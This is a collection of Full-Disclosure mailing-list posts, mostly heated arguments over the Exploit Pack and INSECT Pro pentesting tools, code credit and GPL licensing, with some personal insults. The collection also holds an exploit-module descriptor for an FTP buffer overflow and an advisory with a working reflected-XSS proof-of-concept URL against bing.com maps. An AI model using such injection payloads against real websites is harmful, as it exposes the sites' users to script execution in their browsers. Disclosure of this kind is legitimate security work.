Re: [Full-disclosure] FW: Curso online - Profesional pentesting - Promocion ( 25% de descuento )

2012-05-21 Thread Juan Sacco
Michele Orru.. Sorry to write you directly to the list.. But you did it
too.. So.. please allow me to answer..

Exploit Pack != Beef ... Just similar projects.. different approaches

In fact you came to a webcast where I showed the code of Exploit Pack... I
remember you saying that Exploit Pack is a cool project...

Please check out our javascript agent...
http://www.exploitpack.com/Gate/jsacco.js
http://www.exploitpack.com/Gate/PLAINdoMagic.js

I am not pointing you with a gun.. if you don not like Exploit Pack tools..
just do not use our tools...

In my personal opinion, beef is a good project, in fact I am a big fan of
it. But it doesnt work like i want it, beef cannot handle more than 10
bots.. almost all the times I run the ruby project it crashes.. also some
modules doesnt work either.. the popup persistent is old and do not work on
recent browsers.. among other things.. Also beef doesnt have any module for
defense like clientside SQLi / XSS protection...

SQLi: http://www.youtube.com/watch?v=kD2gI8giOQA
XSS: http://www.youtube.com/watch?v=1rYy5SA9PPsfeature=relmfu

Regards
JSacco

On Sun, May 20, 2012 at 7:40 AM, Michele Orru antisnatc...@gmail.comwrote:

 An btw, his WebSecurity tool is a pure clone of BeEF.

 If you try it, and analyze the Javascript hook file, is the same thing.
 He just change the global variable name from beef to bot, leaving
 everything else :D including the BeEF version he used to copy from.

 LOL.

 On Sun, May 20, 2012 at 8:30 AM, BMF badmotherfs...@gmail.com wrote:
  Actually, this Juan Sacco assclown has been pissing me off too. I'm in
  some group with him on linkedin and getting his messages. I keep
  flagging them as spam. I wish I knew how to get him to stop emailing
  and messaging me.
 
  Juan: Knock it off, you disaffected deleterious douchenozzle.
 
  On Sat, May 19, 2012 at 10:44 AM, Charles Morris cmor...@cs.odu.edu
 wrote:
  I request your permission to test any and all of your facilities in
 any way I deem appropriate including (by not limited to) your personal
 machines, the machines of your coworkers and family, and any other device I
 deem within scope of my testing.   Further, I request you to grant full,
 unlimited access and authorization for me to test these devices in any way
 I see fit with full unadulterated impunity.
 
 
  stop flexing
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/



 --
 /antisnatchor

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Video tutorial: Stack-Based Buffer Overflow

2012-05-16 Thread Juan Sacco
I've made a video  tutorial about buffer overflows take a look and share it
if you like it!

Video tutorial: http://www.youtube.com/watch?v=yPKCSXK8ZYo

Enjoy!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
If you want the right to demand certain things from the program, then go BUY
a program and do not harass people who are writing software for free, or go
and help the developers by writing the functionality yourself.

Juan Sacco

On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote:

 - * @author Stefan Zeiger (szei...@novocode.com)
 - printWritten by Blake  
 - Information Author=Blake Date=August 23 2011 Vulnerability=N/A

 +#Exploit Pack - Security Framework for Exploit Developers
 +#Copyright 2011 Juan Sacco http://exploitpack.com
 +#
 +#This program is free software: you can redistribute it and/or modify
 it under the terms of the
 +#GNU General Public License as published by the Free Software
 Foundation, either version 3
 +#or any later version.
 +#
 +#This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY;
 +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
 PARTICULAR
 +#PURPOSE. See the GNU General Public License for more details.
 +#
 +#You should have received a copy of the GNU General Public License
 along with this program.
 +#If not, see http://www.gnu.org/licenses/



 Ys why not?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
As you might know, or not know, Exploit Pack is working without any
foundation, company, governement and money-giving guy.
There is no professionnal coder, programmer that is paid to develop this
program.

I have tried to ensure that the name of the exploit author is seen in all
the software.It was my bad pasting the license there, but hey! Im human give
me a break you troll.

The next time would be better if you post it in the right place, GitHub.

And in fact youre trying to blame here.

Exploit Pack is licensed GPL let me copy  paste the 4 freedoms. I hope to
do it well this time.

The freedom to run the program, for any purpose (freedom 0).
The freedom to study how the program works, and change it so it does your
computing as you wish (freedom 1). Access to the source code is a
precondition for this.
The freedom to redistribute copies so you can help your neighbor (freedom
2).
The freedom to distribute copies of your modified versions to others
(freedom 3). By doing this you can give the whole community a chance to
benefit from your changes. Access to the source code is a precondition for
this.

Let me ask you why you are spending so much time annoying this GPL software?

I hope next time get a patch of code from you and no nonsense again.

Like I said to lroot. The same goes for YOU. If you want the right to demand
certain things from the program, then go BUY a program and do not harass
people who are writing software for free, or go and help the developers by
writing the functionality yourself.

Juan Sacco

On Wed, Oct 5, 2011 at 6:36 PM, xD 0x41 sec...@gmail.com wrote:

 wow i was not going to comment on that pack and have not yet looked but,
 thats plain nasty... to remove a simple credit line, i mean it is not full
 of greetz etc :s and replace... totally pathetic.



 On 5 October 2011 20:32, root ro...@fibertel.com.ar wrote:

 - * @author Stefan Zeiger (szei...@novocode.com)
 - printWritten by Blake  
 - Information Author=Blake Date=August 23 2011 Vulnerability=N/A

 +#Exploit Pack - Security Framework for Exploit Developers
 +#Copyright 2011 Juan Sacco http://exploitpack.com
 +#
 +#This program is free software: you can redistribute it and/or modify
 it under the terms of the
 +#GNU General Public License as published by the Free Software
 Foundation, either version 3
 +#or any later version.
 +#
 +#This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY;
 +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
 PARTICULAR
 +#PURPOSE. See the GNU General Public License for more details.
 +#
 +#You should have received a copy of the GNU General Public License
 along with this program.
 +#If not, see http://www.gnu.org/licenses/



 Ys why not?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey,
Its really a shame that you didn't even take like 2 minutes to watch the
source code of Exploit Pack before create an opinion.
This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack JAVA.
See the diference? Also, please take a look at the interface design, both
are really different. Show me where Exploit Pack is similar to Canvas! I
think you spent too much time looking for Waldo :-D

We respect the exploit author and that is why I add them at the first line
of the XML file
You should run the program before creating this crappy post with your
nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

Take a look if you want:

?xml version=1.0 encoding=UTF-8?
Module

Exploit NameXML=Free Float FTP Server
CodeName=FreeFloatFTPServer.py  Platform=windows Service=ftp
Type=remote RemotePort=21 LocalPort= ShellcodeAvailable=R
ShellPort= SpecialArgs=
/Exploit

Information Author=Blake Date=August 23 2011 Vulnerability=N/A
Free Float FTP Server USER Command Remote Buffer Overflow Exploit
when parsing the command 'USR', which leads to a stack based overflow.
Also Free Float FTP Server allow remote anonymous login by default
exploiting these issues could allow an attacker to compromise the
application, access or modify data.
/Information

JSacco

On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe... and
 same with his insect pro... he stole metasplit for tht one, then he wants
 repect, when we see him removing simplly one line wich would atleast say a
 ty and, show [ppl who writes, is maybe sometimes stabler than other authors,
 it would be better to have this in, not out.. he should be able to see thats
 how it works with exploit code/pocs in general... sometimes, if i see php
 code from one person, i will tend to look, but if it was from an unknown
 person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I will
 buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 GPL V3 - they had to encumber it to set it free?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.5 was released stay tunned
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey.. I already gave you an answer about this.

AGAIN. For the last time.
I respect the author's name of all the exploits added to Exploit Pack, like
you suggest in a terrible and way.. Insulting and posting like 10 mail to
the this list. I will add a  # Thank you [AUTHOR NAME ] for let us use your
public script  in the top of all new exploit added to Exploit Pack
Framework.

** Also, I created a mailing list to discuss this kind of things, report
bugs and much more ( But sorry, NO INSULTING is allowed there )  **

As other people told you stop doing chatting here. This is not a forum.

JSacco

On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41 sec...@gmail.com wrote:

 Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also 
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the 
 application, access or modify data.
 /Information


 erm, sorry this dont count, it should be IN the code, not, after running it :P
 thats bs mate, and i wont agree with your crap, until you see my point 
 really. It is, something you write, compared to running thwe GUI..

 xd



 On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote:

 Hey,
 Its really a shame that you didn't even take like 2 minutes to watch the
 source code of Exploit Pack before create an opinion.
 This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
 JAVA. See the diference? Also, please take a look at the interface design,
 both are really different. Show me where Exploit Pack is similar to Canvas!
 I think you spent too much time looking for Waldo :-D

 We respect the exploit author and that is why I add them at the first line
 of the XML file
 You should run the program before creating this crappy post with your
 nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

 Take a look if you want:

 ?xml version=1.0 encoding=UTF-8?
 Module

 Exploit NameXML=Free Float FTP Server CodeName=FreeFloatFTPServer.py  
 Platform=windows Service=ftp Type=remote RemotePort=21 LocalPort= 
 ShellcodeAvailable=R ShellPort= SpecialArgs=
 /Exploit

 Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also 
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the 
 application, access or modify data.
 /Information

 JSacco

 On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe...
 and same with his insect pro... he stole metasplit for tht one, then he
 wants repect, when we see him removing simplly one line wich would atleast
 say a ty and, show [ppl who writes, is maybe sometimes stabler than other
 authors, it would be better to have this in, not out.. he should be able to
 see thats how it works with exploit code/pocs in general... sometimes, if i
 see php code from one person, i will tend to look, but if it was from an
 unknown person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I
 will buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011
 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR
 A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 GPL V3 - they had to encumber it to set it free?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
Hey, Wanna Join? and contribute to a with a GPL Project? Welcome aboard!!!
( Please do me a favor and read the license first )

Wanna keep talking about your personal opinion?

Please.. As it was told stop doing it here, this is not a chatroom. We have
a forum and a mailing list for that.

It would be nice to see you there... Believe me.

I invite you all to the new forum! :-)
http://exploitpack.com

Cheers!


On Wed, Oct 5, 2011 at 8:55 PM, xD 0x41 sec...@gmail.com wrote:

 Juan,
 I have not created any opinion (yet) but, is it rally fair, to give people
 who code, 2 frigging dollars, for sometimes what would be 0day , or is it
 nice, to remove the REAL auithors name, and add your own.
 Thats the only grips i see, without having to look at it yet.
 The whole look of it, without 'using' it tho, looks alot like canvas ;p
 but, thats not bad thing and, i personally, dont mind that, coz canvas, is
 not open and, this one is, wich would be great to bring that feel into it..
 so, your reading tomuch into things, when i mean giving credit to author, i
 dont mean putting in his email/greetings and notes, i mean, simply one line
 to give credit, so people who are using the pack, could atleastfeel sure
 with some coders,that the code will be very nice, and not painful to read or
 , modify even to make it nicer.. that is why i like to always makesure
 authors get some credit, however it may be, it only needbe a nick/name, but
 you are using theyre things, but on your people who your paying, i guess you
 should maybe put in place then rules that, all exploits paid for, would not
 recieve credits, other than, part of devteam or part of exploit-pack
 codepack.
 It aint hard to keep people happy. Whilst still producing quality, or, non
 quality.
 i will run your pack, using ONE well know exploit, and if that fails, i
 will have results here, compared to backbox scan or, another vuln scan,
 then, i will comment further. How does that sound?
 Ok. I will do my research, but, i aint angry at you, nor the product, altho
 i dislike Insect, this one, seems to have some good features. So yea, ill
 take an open look, i only think, if code is NOT paid for, then you should
 put authors name or handle in there somwhere, maybe even something for paid
 exploits... people do appreciate a 'thanks to' sometimes... especially you
 it seems.
 xd


 On 6 October 2011 10:47, Juan Sacco juansa...@gmail.com wrote:

 Hey,
 Its really a shame that you didn't even take like 2 minutes to watch the
 source code of Exploit Pack before create an opinion.
 This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
 JAVA. See the diference? Also, please take a look at the interface design,
 both are really different. Show me where Exploit Pack is similar to Canvas!
 I think you spent too much time looking for Waldo :-D

 We respect the exploit author and that is why I add them at the first line
 of the XML file
 You should run the program before creating this crappy post with your
 nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
 insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )

 Take a look if you want:

 ?xml version=1.0 encoding=UTF-8?
 Module

 Exploit NameXML=Free Float FTP Server CodeName=FreeFloatFTPServer.py  
 Platform=windows Service=ftp Type=remote RemotePort=21 LocalPort= 
 ShellcodeAvailable=R ShellPort= SpecialArgs=
 /Exploit

 Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 Free Float FTP Server USER Command Remote Buffer Overflow Exploit
 when parsing the command 'USR', which leads to a stack based overflow. Also 
 Free Float FTP Server allow remote anonymous login by default
 exploiting these issues could allow an attacker to compromise the 
 application, access or modify data.
 /Information

 JSacco

 On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 sec...@gmail.com wrote:

 Heya jeff,
 The author is clearly not smart.
 He is copying other codes, this is a plain rip off of canvas...hehe...
 and same with his insect pro... he stole metasplit for tht one, then he
 wants repect, when we see him removing simplly one line wich would atleast
 say a ty and, show [ppl who writes, is maybe sometimes stabler than other
 authors, it would be better to have this in, not out.. he should be able to
 see thats how it works with exploit code/pocs in general... sometimes, if i
 see php code from one person, i will tend to look, but if it was from an
 unknown person, i prolly wouldnt.
 But this (open sauce) project, i will download and waste 5minutes on.
 Then illm go back to Backbox and BT5 and things wich work :)
 hehe
 (this guy is really mad about his app... and i mean, dang mad angry! I
 will buy some tissues and send to him, that is my donation for his app)
 :))
 xd


 On 6 October 2011 08:59, Jeffrey Walton noloa...@gmail.com wrote:

 On Wed, Oct 5, 2011 at 5:32 AM, root ro...@fibertel.com.ar wrote:
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten

Re: [Full-disclosure] New open source Security Framework

2011-10-06 Thread Juan Sacco
ro...@fibertel.com : I know you don't have any experience with open source
projects, but this is not the right way.
Next time you should try doing it well.

Go to GitHub and write the change your own. The community will moderate it
and then you will see your proposal applied.
To be clear. The license on the script you mention is the license for all
the software not only for the script. Oki Dokie?

1. This is not a chatting room
2. This is not Exploit Pack Dev list

Having that in mind:

If you feel like you have to really make another nonsense question after you
read all the thread.
Then and just then. Send a email to Exploit Pack Dev list.

Please check: http://exploitpack.com/faq
And: http://www.gnu.org/licenses/gpl-3.0.html if you continue having
question about GPL v3

I already make a change on the git repository for you root
ro...@fibertel.com.ar and your friend xD 0x41  sec...@gmail.com, hope next
time you expend two cent for this project.

https://github.com/exploitpack/trunk/blob/master/https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/exploits/code/EasyFTPServer1.7.11.py

#You should have received a copy of the GNU General Public License along
with this program.
#If not, see http://www.gnu.org/licenses/

# Script Author: [Coder Name]
# Thanks for let us use this script on Exploit Pack

JSacco


On Thu, Oct 6, 2011 at 12:34 AM, root ro...@fibertel.com.ar wrote:

 Juan,

 You don't have the faintest idea of how licencing works. You cannot slap
 a GPL v3 license to any software you see, much less erase the author's
 names. If you find a code in the internet without any license, you
 pretty much can't touch it, and must re-implement it completely.

 Software business steal code all the time, but they don't release the
 software for everybody to see!

 Next time instead of a few laughs at a list, you may get sued and lose
 real money, you fool.

 Please learn how licensing works and just then republish all your code.


 On 10/05/2011 06:25 PM, Juan Sacco wrote:
  If you want the right to demand certain things from the program, then go
 BUY
  a program and do not harass people who are writing software for free, or
 go
  and help the developers by writing the functionality yourself.
 
  Juan Sacco
 
  On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote:
 
  - * @author Stefan Zeiger (szei...@novocode.com)
  - printWritten by Blake  
  - Information Author=Blake Date=August 23 2011 Vulnerability=N/A
 
  +#Exploit Pack - Security Framework for Exploit Developers
  +#Copyright 2011 Juan Sacco http://exploitpack.com
  +#
  +#This program is free software: you can redistribute it and/or modify
  it under the terms of the
  +#GNU General Public License as published by the Free Software
  Foundation, either version 3
  +#or any later version.
  +#
  +#This program is distributed in the hope that it will be useful, but
  WITHOUT ANY WARRANTY;
  +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
  PARTICULAR
  +#PURPOSE. See the GNU General Public License for more details.
  +#
  +#You should have received a copy of the GNU General Public License
  along with this program.
  +#If not, see http://www.gnu.org/licenses/
 
 
 
  Ys why not?
 
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-29 Thread Juan Sacco
You are comparing a new product with others who have years of 
development, it is not fair. If you like Core Impact or Metrasploit 
Express, please pay your license and use them.

I'm not pushing you to use my software. INSECT Pro is free and I do it 
because I like it. Not to like you.

Juan Sacco ( runlvl )

On Mon, 29 Aug 2011 13:24:15 -0300, root wrote:
 On 08/27/2011 08:54 AM, Mario Vilas wrote:
 On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote:

 when is smeone going to warez this... it aint free..


 http://www.insecurityresearch.com/files/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 It's just a GUI slapped to a bunch of public exploits taken from
 metasploit and exploit-db. Totally unlike serious software like
 metasploit-pro and core impact.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-29 Thread Juan Sacco
Hey Gage, bad day huh? I don't argue with people on mailing list. You 
are taking INSECT Pro too personal, take it easy.

If you like it, use it, if you dont like it dont use it, if you can do 
it better, do it.

Good luck.

Juan Sacco ( runlvl )

On Mon, 29 Aug 2011 16:53:56 -0700, Gage Bystrom wrote:
 People hate you because you've been stealing software, slapping a new
 wrapper on it, and calling it your own.

 All other complaints, criticisms, or even approvals is nothing in
 light of that simple fact. A light that was cast the first time you
 released InsectPro to FD and all you got was a horde of angry
 researchers telling you to shutup and stop sending stupid crap like
 your stolen software to FD.

 No one is telling you to not use, hell only a few people are telling
 you not to share it. But almost everybody is telling you to KEEP CRAP
 LIKE THIS OFF FULL DISCLOSURE.

 You can argue the crap point all you want and be dismissive, but
 you'll just be missing the point.

 On Mon, Aug 29, 2011 at 9:45 AM, Juan Sacco
 jsa...@insecurityresearch.com wrote:
 You are comparing a new product with others who have years of
 development, it is not fair. If you like Core Impact or Metrasploit
 Express, please pay your license and use them.

 I'm not pushing you to use my software. INSECT Pro is free and I do 
 it
 because I like it. Not to like you.

 Juan Sacco ( runlvl )

 On Mon, 29 Aug 2011 13:24:15 -0300, root wrote:
 On 08/27/2011 08:54 AM, Mario Vilas wrote:
 On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com 
 wrote:

 when is smeone going to warez this... it aint free..


 http://www.insecurityresearch.com/files/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 It's just a GUI slapped to a bunch of public exploits taken from
 metasploit and exploit-db. Totally unlike serious software like
 metasploit-pro and core impact.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

 --
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-28 Thread Juan Sacco
INSECT Pro uses native exploits and these are taken from the Internet, 
modified and tested to work with our tool, the sources of these exploits 
are exploit-db and securityfocus in most cases. Also has support for 
some modules of metasploit.

If you look at INSECT PRO exploit description you could check the 
source of each one, native or metasploit

This isnt a company making a big product, Im doing this because I like 
doing it.

I'm not forcing you to use my software, if you don't like it please 
don't waste bandwith on it.

We are working on a JAVA version in order to support multi-plataform, 
and because I really like to JAVA

We are a small group of developers so we do this on baby steps, we dont 
like to receive that kind of critic from people like you, you should try 
to help instead of drop shit all around the internet

Juan Sacco ( runlvl )

--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.7 was released stay tunned

On Sun, 28 Aug 2011 22:43:00 +0100, Jacqui Caren-home wrote:
 On 27/08/2011 23:12, Dan Dart wrote:
 Looks like it's freeWARE but not free per se.
 With the added disadvantage that it runs on none of the platforms I 
 use.
 How sad. 0/5 review from me then.

 http://www.insecurityresearch.com/files/download/

  From the readme's its an old version of metasploit under a wrapper.

 Also anyone from tightvnc want to see if gpl-violations are 
 interested?

 INSECT 
 Pro/exploits/framework/msf3/external/source/tightvnc/LICENCE.TXT

 GNU GENERAL PUBLIC LICENSE
 Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA
   Everyone is permitted to copy and distribute verbatim copies
   of this license document, but changing it is not allowed.
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7

2011-08-26 Thread Juan Sacco
We are happy to announce a new release of INSECT Pro 2.7 including 
changes that people ask about most often

This is a partial list of the major changes implented in version 2.7

- Available targets now has a submenu under right-click button
- Check update function added in order to verify current version
- Threading support for GET request
- Module log added and functional
- Sniffer support added
- 50 Remote exploits added
- Project saved on userland - Application Data special folder
- Executed module windows added and functionality for it
- AgentConnect now use telnetlib

Download now from: http://www.insecurityresearch.com

Juan Sacco (runlvl)

-- 
--

Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.7 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Advisory 2011 0823 - Zero day - XSS in BING.COM

2011-08-23 Thread Juan Sacco
Information

Name : XSS Reflected on BING.COM
Software : BING.COM MAPS
Vendor Homepage : http://www.bing.com
Vulnerability Type : XSS Reflected
Severity : Very High
Researcher : Juan Sacco (runlvl) jsacco [at] insecurityresearch [dot] 
com

Description
--
BING.COM is prone to a XSS vulnerability because the application fails 
to properly perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the 
victim's browser.

Details
---
The reflected XSS vulnerability is a variant of a cross-site scripting 
flaw: it occurs when the data provided by the attacker is exectued by 
the browser, and then displayed on normal pages returned to other 
users in the course of regular browsing, without proper HTML escaping. A 
classic example of this is with online message boards where users are 
allowed to post HTML formatted messages for other users to read

Exploit example as follow
-

http://www.bing.com/maps/embed/Customize.aspx
?v=2
cp=-34.584743~-58.457621
lvl=6
dir=0
sty=c
eo=
where1=';alert(String.fromCharCode(88,83,83,32,98,121,32,114,117,110,108,118,108))///SCRIPT
form=LMLTEW

The vulnerability is caused by the following code and affected by the 
Generate Code map

div id=LME_mapLinks style=line-height: 20px
 a id=LME_largerMap //--gt;quot;gt;'gt; on Bing Maps (New 
window)View Larger Map/a
/div

Solution
---
No patch are available at this time.

Credits
---
Manual discovered by Insecurity Research Labs
Juan Sacco (runlvl) - http://www.insecurityresearch.com

-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Free tool for penetration security testing

2011-08-23 Thread Juan Sacco
INSECT Pro is a new free tool for Penetration Testing and the ultimate 
resource to demonstrate the security or vulnerability of your network.

INSECT Pro goes beyond simply detecting vulnerabilities to safely 
exploiting them. The first free integrated vulnerability and penetration 
testing tool, INSECT is part of the complete solution Insecurity 
Research offers to evaluate the vulnerabilities on your network.

Download now your copy from http://www.insecurityresearch.com and try 
to defeat and test your network security

If you want to colaborate please write us an email to: 
insect...@insecurityresearch.com or join to our mailing list

Why is free? We have two new members in our team and that allow us to 
keep working and follow our own way. We think that no one should charge 
for knowledge. Of course we have to pay bills, like web space among 
other things.

Insecurity Research is an innovator in software development, our 
products include exploitation development tools, vulnerability 
assessment and remote control technologies.

Juan Sacco ( runlvl )

-- 
--

